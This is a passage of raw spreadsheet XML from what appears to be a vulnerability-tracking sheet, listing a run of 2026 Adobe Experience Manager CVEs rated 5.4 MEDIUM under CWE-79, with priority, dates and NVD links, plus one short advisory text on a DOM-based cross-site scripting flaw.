t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75705</t></is></c></row><row r="1416"><c r="A1416" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1416" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1416" s="5" t="inlineStr"><is><t>CVE-2026-75706</t></is></c><c r="D1416" s="5" t="n"><v>5.4</v></c><c r="E1416" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1416" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1416" s="5" t="inlineStr" /><c r="H1416" s="5" t="n"><v>0.003</v></c><c r="I1416" s="5" t="inlineStr" /><c r="J1416" s="5" t="inlineStr" /><c r="K1416" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1416" s="5" t="inlineStr" /><c r="M1416" s="5" t="inlineStr" /><c r="N1416" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1416" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1416" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1416" s="5" t="inlineStr" /><c r="R1416" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75706</t></is></c></row><row r="1417"><c r="A1417" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1417" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1417" s="5" t="inlineStr"><is><t>CVE-2026-75707</t></is></c><c r="D1417" s="5" t="n"><v>5.4</v></c><c r="E1417" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1417" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1417" s="5" t="inlineStr" /><c r="H1417" s="5" t="n"><v>0.003</v></c><c r="I1417" s="5" t="inlineStr" /><c r="J1417" s="5" t="inlineStr" /><c r="K1417" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1417" s="5" t="inlineStr" /><c r="M1417" s="5" t="inlineStr" /><c r="N1417" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1417" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1417" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1417" s="5" t="inlineStr" /><c r="R1417" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75707</t></is></c></row><row r="1418"><c r="A1418" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1418" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1418" s="5" t="inlineStr"><is><t>CVE-2026-75708</t></is></c><c r="D1418" s="5" t="n"><v>5.4</v></c><c r="E1418" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1418" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1418" s="5" t="inlineStr" /><c r="H1418" s="5" t="n"><v>0.003</v></c><c r="I1418" s="5" t="inlineStr" /><c r="J1418" s="5" t="inlineStr" /><c r="K1418" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1418" s="5" t="inlineStr" /><c r="M1418" s="5" t="inlineStr" /><c r="N1418" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1418" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1418" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1418" s="5" t="inlineStr" /><c r="R1418" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75708</t></is></c></row><row r="1419"><c r="A1419" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1419" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1419" s="5" t="inlineStr"><is><t>CVE-2026-75709</t></is></c><c r="D1419" s="5" t="n"><v>5.4</v></c><c r="E1419" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1419" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1419" s="5" t="inlineStr" /><c r="H1419" s="5" t="n"><v>0.003</v></c><c r="I1419" s="5" t="inlineStr" /><c r="J1419" s="5" t="inlineStr" /><c r="K1419" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1419" s="5" t="inlineStr" /><c r="M1419" s="5" t="inlineStr" /><c r="N1419" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1419" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1419" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1419" s="5" t="inlineStr" /><c r="R1419" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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19" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75709</t></is></c></row><row r="1420"><c r="A1420" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1420" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1420" s="5" t="inlineStr"><is><t>CVE-2026-75710</t></is></c><c r="D1420" s="5" t="n"><v>5.4</v></c><c r="E1420" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1420" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1420" s="5" t="inlineStr" /><c r="H1420" s="5" t="n"><v>0.003</v></c><c r="I1420" s="5" t="inlineStr" /><c r="J1420" s="5" t="inlineStr" /><c r="K1420" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1420" s="5" t="inlineStr" /><c r="M1420" s="5" t="inlineStr" /><c r="N1420" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1420" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1420" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1420" s="5" t="inlineStr" /><c r="R1420" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75710</t></is></c></row><row r="1421"><c r="A1421" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1421" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1421" s="5" t="inlineStr"><is><t>CVE-2026-75711</t></is></c><c r="D1421" s="5" t="n"><v>5.4</v></c><c r="E1421" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1421" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1421" s="5" t="inlineStr" /><c r="H1421" s="5" t="n"><v>0.003</v></c><c r="I1421" s="5" t="inlineStr" /><c r="J1421" s="5" t="inlineStr" /><c r="K1421" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1421" s="5" t="inlineStr" /><c r="M1421" s="5" t="inlineStr" /><c r="N1421" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1421" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1421" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1421" s="5" t="inlineStr" /><c r="R1421" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75711</t></is></c></row><row r="1422"><c r="A1422" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1422" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1422" s="5" t="inlineStr"><is><t>CVE-2026-75712</t></is></c><c r="D1422" s="5" t="n"><v>5.4</v></c><c r="E1422" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1422" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1422" s="5" t="inlineStr" /><c r="H1422" s="5" t="n"><v>0.003</v></c><c r="I1422" s="5" t="inlineStr" /><c r="J1422" s="5" t="inlineStr" /><c r="K1422" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1422" s="5" t="inlineStr" /><c r="M1422" s="5" t="inlineStr" /><c r="N1422" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1422" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1422" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1422" s="5" t="inlineStr" /><c r="R1422" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75712</t></is></c></row><row r="1423"><c r="A1423" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1423" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1423" s="5" t="inlineStr"><is><t>CVE-2026-75713</t></is></c><c r="D1423" s="5" t="n"><v>5.4</v></c><c r="E1423" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1423" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1423" s="5" t="inlineStr" /><c r="H1423" s="5" t="n"><v>0.003</v></c><c r="I1423" s="5" t="inlineStr" /><c r="J1423" s="5" t="inlineStr" /><c r="K1423" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1423" s="5" t="inlineStr" /><c r="M1423" s="5" t="inlineStr" /><c r="N1423" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1423" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1423" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1423" s="5" t="inlineStr" /><c r="R1423" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S142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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75713</t></is></c></row><row r="1424"><c r="A1424" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1424" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1424" s="5" t="inlineStr"><is><t>CVE-2026-75714</t></is></c><c r="D1424" s="5" t="n"><v>5.4</v></c><c r="E1424" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1424" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1424" s="5" t="inlineStr" /><c r="H1424" s="5" t="n"><v>0.003</v></c><c r="I1424" s="5" t="inlineStr" /><c r="J1424" s="5" t="inlineStr" /><c r="K1424" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1424" s="5" t="inlineStr" /><c r="M1424" s="5" t="inlineStr" /><c r="N1424" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1424" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1424" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1424" s="5" t="inlineStr" /><c r="R1424" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1424"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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75714</t></is></c></row><row r="1425"><c r="A1425" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1425" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1425" s="5" t="inlineStr"><is><t>CVE-2026-75715</t></is></c><c r="D1425" s="5" t="n"><v>5.4</v></c><c r="E1425" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1425" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1425" s="5" t="inlineStr" /><c r="H1425" s="5" t="n"><v>0.003</v></c><c r="I1425" s="5" t="inlineStr" /><c r="J1425" s="5" t="inlineStr" /><c r="K1425" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1425" s="5" t="inlineStr" /><c r="M1425" s="5" t="inlineStr" /><c r="N1425" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1425" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1425" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1425" s="5" t="inlineStr" /><c r="R1425" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1425"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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75715</t></is></c></row><row r="1426"><c r="A1426" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1426" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1426" s="5" t="inlineStr"><is><t>CVE-2026-75716</t></is></c><c r="D1426" s="5" t="n"><v>5.4</v></c><c r="E1426" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1426" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1426" s="5" t="inlineStr" /><c r="H1426" s="5" t="n"><v>0.003</v></c><c r="I1426" s="5" t="inlineStr" /><c r="J1426" s="5" t="inlineStr" /><c r="K1426" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1426" s="5" t="inlineStr" /><c r="M1426" s="5" t="inlineStr" /><c r="N1426" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1426" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1426" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1426" s="5" t="inlineStr" /><c r="R1426" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1426"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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75716</t></is></c></row><row r="1427"><c r="A1427" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1427" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1427" s="5" t="inlineStr"><is><t>CVE-2026-75717</t></is></c><c r="D1427" s="5" t="n"><v>5.4</v></c><c r="E1427" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1427" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1427" s="5" t="inlineStr" /><c r="H1427" s="5" t="n"><v>0.003</v></c><c r="I1427" s="5" t="inlineStr" /><c r="J1427" s="5" t="inlineStr" /><c r="K1427" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1427" s="5" t="inlineStr" /><c r="M1427" s="5" t="inlineStr" /><c r="N1427" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1427" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1427" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1427" s="5" t="inlineStr" /><c r="R1427" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1427"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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75717</t></is></c></row><row r="1428"><c r="A1428" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1428" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1428" s="5" t="inlineStr"><is><t>CVE-2026-75718</t></is></c><c r="D1428" s="5" t="n"><v>5.4</v></c><c r="E1428" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1428" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1428" s="5" t="inlineStr" /><c r="H1428" s="5" t="n"><v>0.003</v></c><c r="I1428" s="5" t="inlineStr" /><c r="J1428" s="5" t="inlineStr" /><c r="K1428" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1428" s="5" t="inlineStr" /><c r="M1428" s="5" t="inlineStr" /><c r="N1428" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1428" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1428" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1428" s="5" t="inlineStr" /><c r="R1428" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1428"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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75718</t></is></c></row><row r="1429"><c r="A1429" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1429" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1429" s="5" t="inlineStr"><is><t>CVE-2026-75719</t></is></c><c r="D1429" s="5" t="n"><v>5.4</v></c><c r="E1429" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1429" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1429" s="5" t="inlineStr" /><c r="H1429" s="5" t="n"><v>0.003</v></c><c r="I1429" s="5" t="inlineStr" /><c r="J1429" s="5" t="inlineStr" /><c r="K1429" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1429" s="5" t="inlineStr" /><c r="M1429" s="5" t="inlineStr" /><c r="N1429" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1429" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1429" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1429" s="5" t="inlineStr" /><c r="R1429" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1429"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29" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75719</t></is></c></row><row r="1430"><c r="A1430" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1430" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1430" s="5" t="inlineStr"><is><t>CVE-2026-75720</t></is></c><c r="D1430" s="5" t="n"><v>5.4</v></c><c r="E1430" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1430" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1430" s="5" t="inlineStr" /><c r="H1430" s="5" t="n"><v>0.003</v></c><c r="I1430" s="5" t="inlineStr" /><c r="J1430" s="5" t="inlineStr" /><c r="K1430" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1430" s="5" t="inlineStr" /><c r="M1430" s="5" t="inlineStr" /><c r="N1430" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1430" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1430" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1430" s="5" t="inlineStr" /><c r="R1430" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1430"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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75720</t></is></c></row><row r="1431"><c r="A1431" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1431" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1431" s="5" t="inlineStr"><is><t>CVE-2026-75722</t></is></c><c r="D1431" s="5" t="n"><v>5.4</v></c><c r="E1431" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1431" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1431" s="5" t="inlineStr" /><c r="H1431" s="5" t="n"><v>0.003</v></c><c r="I1431" s="5" t="inlineStr" /><c r="J1431" s="5" t="inlineStr" /><c r="K1431" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1431" s="5" t="inlineStr" /><c r="M1431" s="5" t="inlineStr" /><c r="N1431" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1431" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1431" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1431" s="5" t="inlineStr" /><c r="R1431" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1431"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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75722</t></is></c></row><row r="1432"><c r="A1432" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1432" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1432" s="5" t="inlineStr"><is><t>CVE-2026-75724</t></is></c><c r="D1432" s="5" t="n"><v>5.4</v></c><c r="E1432" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1432" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1432" s="5" t="inlineStr" /><c r="H1432" s="5" t="n"><v>0.003</v></c><c r="I1432" s="5" t="inlineStr" /><c r="J1432" s="5" t="inlineStr" /><c r="K1432" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1432" s="5" t="inlineStr" /><c r="M1432" s="5" t="inlineStr" /><c r="N1432" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1432" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1432" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1432" s="5" t="inlineStr" /><c r="R1432" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1432"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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75724</t></is></c></row><row r="1433"><c r="A1433" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1433" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1433" s="5" t="inlineStr"><is><t>CVE-2026-75725</t></is></c><c r="D1433" s="5" t="n"><v>5.4</v></c><c r="E1433" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1433" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1433" s="5" t="inlineStr" /><c r="H1433" s="5" t="n"><v>0.003</v></c><c r="I1433" s="5" t="inlineStr" /><c r="J1433" s="5" t="inlineStr" /><c r="K1433" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1433" s="5" t="inlineStr" /><c r="M1433" s="5" t="inlineStr" /><c r="N1433" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1433" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1433" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1433" s="5" t="inlineStr" /><c r="R1433" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1433" s="5" t="inlineStr"><is><t>Adobe Experience Manager is affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed.</t></is></c><c r="T1433" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75725</t></is></c></row><row r="1434"><c r="A1434" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1434" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1434" s="5" t="inlineStr"><is><t>CVE-2026-75727</t></is></c><c r="D1434" s="5" t="n"><v>5.4</v></c><c r="E1434" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1434" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1434" s="5" t="inlineStr" /><c r="H1434" s="5" t="n"><v>0.003</v></c><c r="I1434" s="5" t="inlineStr" /><c r="J1434" s="5" t="inlineStr" /><c r="K1434" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1434" s="5" t="inlineStr" /><c r="M1434" s="5" t="inlineStr" /><c r="N1434" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1434" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1434" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1434" s="5" t="inlineStr" /><c r="R1434" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1434"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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75727</t></is></c></row><row r="1435"><c r="A1435" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1435" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1435" s="5" t="inlineStr"><is><t>CVE-2026-75729</t></is></c><c r="D1435" s="5" t="n"><v>5.4</v></c><c r="E1435" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1435" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1435" s="5" t="inlineStr" /><c r="H1435" s="5" t="n"><v>0.003</v></c><c r="I1435" s="5" t="inlineStr" /><c r="J1435" s="5" t="inlineStr" /><c r="K1435" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1435" s="5" t="inlineStr" /><c r="M1435" s="5" t="inlineStr" /><c r="N1435" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1435" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1435" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1435" s="5" t="inlineStr" /><c r="R1435" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1435"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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75729</t></is></c></row><row r="1436"><c r="A1436" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1436" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1436" s="5" t="inlineStr"><is><t>CVE-2026-75730</t></is></c><c r="D1436" s="5" t="n"><v>5.4</v></c><c r="E1436" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1436" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1436" s="5" t="inlineStr" /><c r="H1436" s="5" t="n"><v>0.003</v></c><c r="I1436" s="5" t="inlineStr" /><c r="J1436" s="5" t="inlineStr" /><c r="K1436" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1436" s="5" t="inlineStr" /><c r="M1436" s="5" t="inlineStr" /><c r="N1436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1436" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1436" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1436" s="5" t="inlineStr" /><c r="R1436" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75730</t></is></c></row><row r="1437"><c r="A1437" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1437" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1437" s="5" t="inlineStr"><is><t>CVE-2026-75731</t></is></c><c r="D1437" s="5" t="n"><v>5.4</v></c><c r="E1437" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1437" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1437" s="5" t="inlineStr" /><c r="H1437" s="5" t="n"><v>0.003</v></c><c r="I1437" s="5" t="inlineStr" /><c r="J1437" s="5" t="inlineStr" /><c r="K1437" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1437" s="5" t="inlineStr" /><c r="M1437" s="5" t="inlineStr" /><c r="N1437" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1437" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1437" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1437" s="5" t="inlineStr" /><c r="R1437" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75731</t></is></c></row><row r="1438"><c r="A1438" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1438" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1438" s="5" t="inlineStr"><is><t>CVE-2026-75733</t></is></c><c r="D1438" s="5" t="n"><v>5.4</v></c><c r="E1438" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1438" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1438" s="5" t="inlineStr" /><c r="H1438" s="5" t="n"><v>0.003</v></c><c r="I1438" s="5" t="inlineStr" /><c r="J1438" s="5" t="inlineStr" /><c r="K1438" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1438" s="5" t="inlineStr" /><c r="M1438" s="5" t="inlineStr" /><c r="N1438" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1438" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1438" s="5" t="inlineStr" /><c r="R1438" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S143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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75733</t></is></c></row><row r="1439"><c r="A1439" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1439" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1439" s="5" t="inlineStr"><is><t>CVE-2026-75734</t></is></c><c r="D1439" s="5" t="n"><v>5.4</v></c><c r="E1439" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1439" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1439" s="5" t="inlineStr" /><c r="H1439" s="5" t="n"><v>0.003</v></c><c r="I1439" s="5" t="inlineStr" /><c r="J1439" s="5" t="inlineStr" /><c r="K1439" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1439" s="5" t="inlineStr" /><c r="M1439" s="5" t="inlineStr" /><c r="N1439" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1439" s="5" 